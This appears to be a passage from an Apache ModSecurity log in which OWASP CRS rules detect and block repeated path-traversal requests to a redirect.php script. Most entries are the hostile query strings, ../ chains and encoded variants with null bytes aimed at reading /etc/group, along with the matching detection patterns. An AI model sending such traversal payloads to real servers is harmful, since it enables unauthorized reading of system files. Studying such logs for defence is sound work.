[uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.102287 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.102324 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.102353 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.102405 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.102985 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.103217 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.242123 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglgAAAFU"]
[Tue May 12 05:32:45.242196 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglgAAAFU"]
[Tue May 12 05:32:45.242238 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglgAAAFU"]
[Tue May 12 05:32:45.242304 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglgAAAFU"]
[Tue May 12 05:32:45.242879 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglgAAAFU"]
[Tue May 12 05:32:45.243131 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglgAAAFU"]
[Tue May 12 05:32:45.381776 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.381832 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.382051 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.382102 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.382136 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.382179 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.382237 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.382840 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.383111 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglwAAAFU"]
[Tue May 12 05:32:45.521773 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmAAAAFU"]
[Tue May 12 05:32:45.521854 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmAAAAFU"]
[Tue May 12 05:32:45.521886 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmAAAAFU"]
[Tue May 12 05:32:45.521974 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmAAAAFU"]
[Tue May 12 05:32:45.522595 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmAAAAFU"]
[Tue May 12 05:32:45.522955 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmAAAAFU"]
[Tue May 12 05:32:45.661864 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.661947 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.662132 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.662174 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.662204 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizezigmQAAAFU"]
[Tue May 12 05:32:45.662236 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id 